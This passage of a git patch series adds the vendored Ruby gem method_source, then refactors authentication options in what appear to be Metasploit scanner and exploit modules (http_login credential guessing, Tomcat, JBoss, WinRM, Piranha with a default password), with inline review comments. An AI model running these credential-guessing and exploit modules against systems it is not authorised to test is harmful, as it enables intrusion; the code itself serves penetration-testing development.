!source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + (line - 1).times { file.readline } + + code = "" + loop do + val = file.readline + code << val + + return code if valid_expression?(code) + end + end + end + + # Helper method responsible for opening source file and buffering up + # the comments for a specified method. Defined here to avoid polluting + # `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [String] The comments up to the point of the method. 
+ def self.comment_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + buffer = "" + (line - 1).times do + line = file.readline + # Add any line that is a valid ruby comment, + # but clear as soon as we hit a non comment line. + if (line =~ /^\s*#/) || (line =~ /^\s*$/) + buffer << line.lstrip + else + buffer.replace("") + end + end + + buffer + end + end + + # This module is to be included by `Method` and `UnboundMethod` and + # provides the `#source` functionality + module MethodExtensions + + # We use the included hook to patch Method#source on rubinius. + # We need to use the included hook as Rubinius defines a `source` + # on Method so including a module will have no effect (as it's + # higher up the MRO). + # @param [Class] klass The class that includes the module. + def self.included(klass) + if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && + RUBY_ENGINE =~ /rbx/ + + klass.class_eval do + orig_source = instance_method(:source) + + define_method(:source) do + begin + super + rescue + orig_source.bind(self).call + end + end + + end + end + end + + # Return the sourcecode for the method as a string + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method sourcecode as a string + # @example + # Set.instance_method(:clear).source.display + # => + # def clear + # @hash.clear + # self + # end + def source + if respond_to?(:source_location) + source = MethodSource.source_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !source + else + raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" + end + + source + end + + # Return the comments associated with the method as a string. 
+ # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method's comments as a string + # @example + # Set.instance_method(:clear).comment.display + # => + # # Removes all elements and returns self. + def comment + if respond_to?(:source_location) + comment = MethodSource.comment_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !comment + else + raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" + end + + comment + end + end +end + +class Method + include MethodSource::SourceLocation::MethodExtensions + include MethodSource::MethodExtensions +end + +class UnboundMethod + include MethodSource::SourceLocation::UnboundMethodExtensions + include MethodSource::MethodExtensions +end + +class Proc + include MethodSource::SourceLocation::ProcExtensions + include MethodSource::MethodExtensions +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb new file mode 100644 index 0000000000..9161854819 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb 
@@ -0,0 +1,138 @@ +module MethodSource + module ReeSourceLocation + # Ruby enterprise edition provides all the information that's + # needed, in a slightly different way. + def source_location + [__file__, __line__] rescue nil + end + end + + module SourceLocation + module MethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + else + + + def trace_func(event, file, line, id, binding, classname) + return unless event == 'call' + set_trace_func nil + + @file, @line = file, line + raise :found + end + + private :trace_func + + # Return the source location of a method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + if @file.nil? + args =[*(1..(arity<-1 ? -arity-1 : arity ))] + + set_trace_func method(:trace_func).to_proc + call(*args) rescue nil + set_trace_func nil + @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) + end + return [@file, @line] if File.exist?(@file.to_s) + end + end + end + + module ProcExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ + + # Return the source location for a Proc (Rubinius only) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + [block.file.to_s, block.line] + end + else + + # Return the source location for a Proc (in implementations + # without Proc#source_location) + # @return [Array] A two element array. 
First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + self.to_s =~ /@(.*):(\d+)/ + [$1, $2.to_i] + end + end + end + + module UnboundMethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + + else + + + # Return the source location of an instance method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + klass = case owner + when Class + owner + when Module + method_owner = owner + Class.new { include(method_owner) } + end + + # deal with immediate values + case + when klass == Symbol + return :a.method(name).source_location + when klass == Fixnum + return 0.method(name).source_location + when klass == TrueClass + return true.method(name).source_location + when klass == FalseClass + return false.method(name).source_location + when klass == NilClass + return nil.method(name).source_location + end + + begin + Object.instance_method(:method).bind(klass.allocate).call(name).source_location + rescue TypeError + + # Assume we are dealing with a Singleton Class: + # 1. Get the instance object + # 2. Forward the source_location lookup to the instance + instance ||= ObjectSpace.each_object(owner).first + Object.instance_method(:method).bind(instance).call(name).source_location + end + end + end + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb new file mode 100644 index 0000000000..b8142bfaef --- /dev/null 
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb @@ -0,0 +1,3 @@ +module MethodSource + VERSION = "0.7.1" +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec new file mode 100644 index 0000000000..83a727d6f6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec @@ -0,0 +1,33 @@ +# -*- encoding: utf-8 -*- + +Gem::Specification.new do |s| + s.name = "method_source" + s.version = "0.7.0" + + s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= + s.authors = ["John Mair (banisterfiend)"] + s.date = "2012-01-01" + s.description = "retrieve the sourcecode for a method" + s.email = "jrmair@gmail.com" + s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] + s.homepage = "http://banisterfiend.wordpress.com" + s.require_paths = ["lib"] + s.rubygems_version = "1.8.10" + s.summary = "retrieve the sourcecode for a method" + s.test_files = ["test/test.rb", "test/test_helper.rb"] + + if s.respond_to? :specification_version then + s.specification_version = 3 + + if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then + s.add_development_dependency(%q, ["~> 1.1.0"]) + s.add_development_dependency(%q, ["~> 0.9"]) + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb new file mode 100644 index 0000000000..425e56acf9 --- /dev/null 
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb 
@@ -0,0 +1,122 @@ +direc = File.dirname(__FILE__) + +require 'rubygems' +require 'bacon' +require "#{direc}/../lib/method_source" +require "#{direc}/test_helper" + +describe MethodSource do + + describe "source_location (testing 1.8 implementation)" do + it 'should return correct source_location for a method' do + method(:hello).source_location.first.should =~ /test_helper/ + end + + it 'should not raise for immediate instance methods' do + [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| + lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise + end + end + + it 'should not raise for immediate methods' do + [:a, 1, true, false, nil].each do |immediate| + lambda { immediate.method(:to_s).source_location }.should.not.raise + end + end + end + + before do + @hello_module_source = " def hello; :hello_module; end\n" + @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" + @hello_source = "def hello; :hello; end\n" + @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" + @lambda_comment = "# This is a comment for MyLambda\n" + @lambda_source = "MyLambda = lambda { :lambda }\n" + @proc_source = "MyProc = Proc.new { :proc }\n" + end + + it 'should define methods on Method and UnboundMethod and Proc' do + Method.method_defined?(:source).should == true + UnboundMethod.method_defined?(:source).should == true + Proc.method_defined?(:source).should == true + end + + describe "Methods" do + it 'should return source for method' do + method(:hello).source.should == @hello_source + end + + it 'should return source for a method defined in a module' do + M.instance_method(:hello).source.should == @hello_module_source + end + + it 'should return source for a singleton method as an instance method' do + class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source + end + + it 'should return source for a singleton method' do + 
$o.method(:hello).source.should == @hello_singleton_source + end + + + it 'should return a comment for method' do + method(:hello).comment.should == @hello_comment + end + + + if !is_rbx? + it 'should raise for C methods' do + lambda { method(:puts).source }.should.raise RuntimeError + end + end + end + + # if RUBY_VERSION =~ /1.9/ || is_rbx? + describe "Lambdas and Procs" do + it 'should return source for proc' do + MyProc.source.should == @proc_source + end + + it 'should return an empty string if there is no comment' do + MyProc.comment.should == '' + end + + it 'should return source for lambda' do + MyLambda.source.should == @lambda_source + end + + it 'should return comment for lambda' do + MyLambda.comment.should == @lambda_comment + end + end + # end + describe "Comment tests" do + before do + @comment1 = "# a\n# b\n" + @comment2 = "# a\n# b\n" + @comment3 = "# a\n#\n# b\n" + @comment4 = "# a\n# b\n" + @comment5 = "# a\n# b\n# c\n# d\n" + end + + it "should correctly extract multi-line comments" do + method(:comment_test1).comment.should == @comment1 + end + + it "should correctly strip leading whitespace before comments" do + method(:comment_test2).comment.should == @comment2 + end + + it "should keep empty comment lines" do + method(:comment_test3).comment.should == @comment3 + end + + it "should ignore blank lines between comments" do + method(:comment_test4).comment.should == @comment4 + end + + it "should align all comments to same indent level" do + method(:comment_test5).comment.should == @comment5 + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb new file mode 100644 index 0000000000..53da4e519c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb 
@@ -0,0 +1,50 @@ +def is_rbx? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ +end + +def jruby? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ +end + + +module M + def hello; :hello_module; end +end + +$o = Object.new +def $o.hello; :hello_singleton; end + +# A comment for hello + + # It spans two lines and is indented by 2 spaces +def hello; :hello; end + +# a +# b +def comment_test1; end + + # a + # b +def comment_test2; end + +# a +# +# b +def comment_test3; end + +# a + +# b +def comment_test4; end + + +# a + # b + # c +# d +def comment_test5; end + +# This is a comment for MyLambda +MyLambda = lambda { :lambda } +MyProc = Proc.new { :proc } + From 0ae489b37b34abe3f2fabeeb65deb83922d1c800 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 23:16:46 -0600 Subject: [PATCH 23/87] last of revert-merge snaffu --- modules/auxiliary/gather/shodan_search.rb | 4 +- .../scanner/http/cisco_device_manager.rb | 4 +- modules/auxiliary/scanner/http/http_login.rb | 186 +++--------------- .../scanner/http/tomcat_mgr_login.rb | 7 +- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 - .../auxiliary/scanner/winrm/winrm_login.rb | 6 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 7 +- modules/auxiliary/server/http_ntlmrelay.rb | 3 +- .../linux/http/piranha_passwd_exec.rb | 6 +- modules/exploits/multi/http/axis2_deployer.rb | 4 +- .../exploits/multi/http/jboss_bshdeployer.rb | 3 - .../exploits/multi/http/jboss_maindeployer.rb | 3 - .../exploits/multi/http/tomcat_mgr_deploy.rb | 14 +- .../unix/webapp/oracle_vm_agent_utl.rb | 3 - modules/exploits/windows/http/easyftp_list.rb | 4 +- .../windows/http/xampp_webdav_upload_php.rb | 10 +- .../windows/winrm/winrm_script_exec.rb | 23 +-- 17 files changed, 52 insertions(+), 239 deletions(-) diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 8b114dbdd8..218427cc1f 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb 
@@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary )) # disabling all the unnecessary options that someone might set to break our query - deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', + deregister_options('RPORT','RHOST', 'DOMAIN', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', - 'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') + 'NTLM::UseNTLMv2','SSL') register_options( [ diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index fd57fda9bb..9486262be7 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Cisco Device HTTP Device Manager Access', 'Description' => %q{ This module gathers data from a Cisco device (router or switch) with the device manager - web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify + web interface exposed. The USERNAME and PASSWORD options can be used to specify authentication. }, 'Author' => [ 'hdm' ], @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary print_good("#{rhost}:#{rport} Successfully authenticated to this device") # Report a vulnerability only if no password was specified - if datastore['BasicAuthPass'].to_s.length == 0 + if datastore['PASSWORD'].to_s.length == 0 report_vuln( { diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 5a6b0ab9a6..4324e312f2 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb 
@@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) end - def find_auth_uri_and_scheme + def find_auth_uri - path_and_scheme = [] if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 paths = [datastore['AUTH_URI']] else @@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary next if not res end - next if not res.code == 401 - next if not res.headers['WWW-Authenticate'] - path_and_scheme << path - case res.headers['WWW-Authenticate'] - when /Basic/i - path_and_scheme << "Basic" - when /NTLM/i - path_and_scheme << "NTLM" - when /Digest/i - path_and_scheme << "Digest" - end - return path_and_scheme + return path end - return path_and_scheme + return path end def target_url @@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary print_error("You need need to set AUTH_URI when using PUT Method !") return end - @uri, @scheme = find_auth_uri_and_scheme() + @uri = find_auth_uri if ! @uri print_error("#{target_url} No URI found that asks for HTTP authentication") return @@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary @uri = "/#{@uri}" if @uri[0,1] != "/" - if ! @scheme - print_error("#{target_url} Incompatible authentication scheme") - return - end - - print_status("Attempting to login to #{target_url} with #{@scheme} authentication") + print_status("Attempting to login to #{target_url}") each_user_pass { |user, pass| do_login(user, pass) 
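Review bot: In the hunk at `@@ -80,21 +79,10 @@`, `find_auth_uri` now returns the first path that produces any response, because the `res.code == 401` and `WWW-Authenticate` checks were removed together with the scheme detection. A page that needs no authentication can then be chosen as the login target, and the 200 it returns would be recorded as a valid credential pair. I would keep `next unless res.code == 401 && res.headers['WWW-Authenticate']` ahead of `return path`. The final `return path` sits after the loop, where `path` looks like the block parameter and would be out of scope; `return nil` would match the `if ! @uri` test in the caller. The loop starts outside the hunk, so the scoping point should be confirmed against the full method.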
@@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - success = false - proof = "" - - ret = do_http_login(user,pass,@scheme) - return :abort if ret == :abort - if ret == :success - proof = @proof.dup - success = true - end - - if success + + response = do_http_login(user,pass) + result = determine_result(response) + + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") any_user = false any_pass = false vprint_status("#{target_url} - Trying random username with password:'#{pass}'") - any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) + any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass)) vprint_status("#{target_url} - Trying username:'#{user}' with random password") - any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) + any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8))) if any_user == :success user = "anyuser" @@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary :sname => (ssl ? 'https' : 'http'), :user => user, :pass => pass, - :proof => "WEBAPP=\"Generic\", PROOF=#{proof}", + :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}", :source_type => "user_supplied", :active => true ) 
@@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary end end - def do_http_login(user,pass,scheme) - case scheme - when /NTLM/i - do_http_auth_ntlm(user,pass) - when /Digest/i - do_http_auth_digest(user,pass,datastore['REQUESTTYPE']) - when /Basic/i - do_http_auth_basic(user,pass) - else - vprint_error("#{target_url}: Unknown authentication scheme") - return :abort - end - end - - def do_http_auth_ntlm(user,pass) + def do_http_login(user,pass) begin - resp,c = send_http_auth_ntlm( + response = send_request_cgi({ 'uri' => @uri, + 'method' => datastore['REQUESTTYPE'], 'username' => user, 'password' => pass - ) - c.close - return :abort if (resp.code == 404) - - if [200, 301, 302].include?(resp.code) - @proof = resp - return :success - end - + }) + return response rescue ::Rex::ConnectionError vprint_error("#{target_url} - Failed to connect to the web server") - return :abort + return nil end - - return :fail end - def do_http_auth_basic(user,pass) - user_pass = Rex::Text.encode_base64(user + ":" + pass) - - begin - res = send_request_cgi({ - 'uri' => @uri, - 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } - }, 25) - - unless (res.kind_of? 
Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if [200, 301, 302].include?(res.code) - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - - return :fail - end - - def do_http_auth_digest(user,pass,requesttype) - path = datastore['AUTH_URI'] || "/" - begin - if requesttype == "PUT" - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => 'Test123\r\n', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - elsif requesttype == "PROPFIND" - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => '', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass, - 'headers' => { 'Depth' => '0'} - }, 25) - else - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - end - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) - if ((res.code == 201) and (requesttype == "PUT")) - print_good("Trying to delete #{path}") - del_res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => 'DELETE', - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - if not (del_res.code == 204) - print_error("#{path} could be created, but not deleted again. 
This may have been noisy ...") - end - end - @proof = res - return :success - end - - if (res.code == 207) and (requesttype == "PROPFIND") - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - + def determine_result(response) + return :abort unless response.kind_of? Rex::Proto::Http::Response + return :abort unless response.code + return :success if [200, 301, 302].include?(response.code) return :fail end diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 65ab691e66..a3581d16b0 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'") success = false srvhdr = '?' - user_pass = Rex::Text.encode_base64(user + ":" + pass) uri = normalize_uri(datastore['URI']) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } + 'username' => user, + 'password' => pass }, 25) unless (res.kind_of? Rex::Proto::Http::Response) vprint_error("http://#{rhost}:#{rport}#{uri} not responding") diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index 12f0c70422..88e9e717d6 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end streams = winrm_run_cmd(datastore['CMD']) return unless streams.class == Hash print_error streams['stderr'] unless streams['stderr'] == '' 
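Review bot: `determine_result` classifies a response only by `[200, 301, 302]`, so the status handling of the removed methods is lost even though `do_http_login` still passes `REQUESTTYPE` as the request method. A 404 used to return `:abort` and now returns `:fail`, so the run presumably keeps sending the remaining credential pairs to a URI that does not exist. A 201 on PUT and a 207 on PROPFIND used to count as success and now count as failure. At minimum I would add `return :abort if response.code == 404` before the success test, and decide explicitly whether PUT and PROPFIND remain supported values for `REQUESTTYPE`.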
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index d8012fb723..946903113e 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end each_user_pass do |user, pass| - resp,c = send_request_ntlm(test_request) + resp = send_winrm_request(test_request) if resp.nil? print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" return diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index ed09cfd583..0c5eeb6274 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end - - resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" return diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index fda08e41c4..080803918b 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb 
@@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) ], self.class) - deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', - 'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', + deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') end diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index d87027cadb..85ff71eca8 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q']) ], self.class) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res.code == 401 - print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") + print_error("401 Authorization Required! Our Credentials not accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 565d73a293..9f030bbbc2 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb 
@@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote authmsg = res.headers['WWW-Authenticate'] end print_error("The remote server responded expecting authentication") - if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] - print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser']) - elsif authmsg + if authmsg print_error("WWW-Authenticate: %s" % authmsg) end cleanup_instructions(rpath, name) # display cleanup info diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 07d5eb2ada..f350fe4984 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 7c36c1fa16..2297b52569 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index a46cd2c033..2757cb6e13 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb 
@@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote end def check - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - res = query_serverinfo disconnect return CheckCode::Unknown if res.nil? @@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) @@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target @@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 9865c8716b..3bfd6c668e 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote end def go(command) - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - xml = <<-EOS diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 3484cdf86f..e162cd74f6 100644 --- 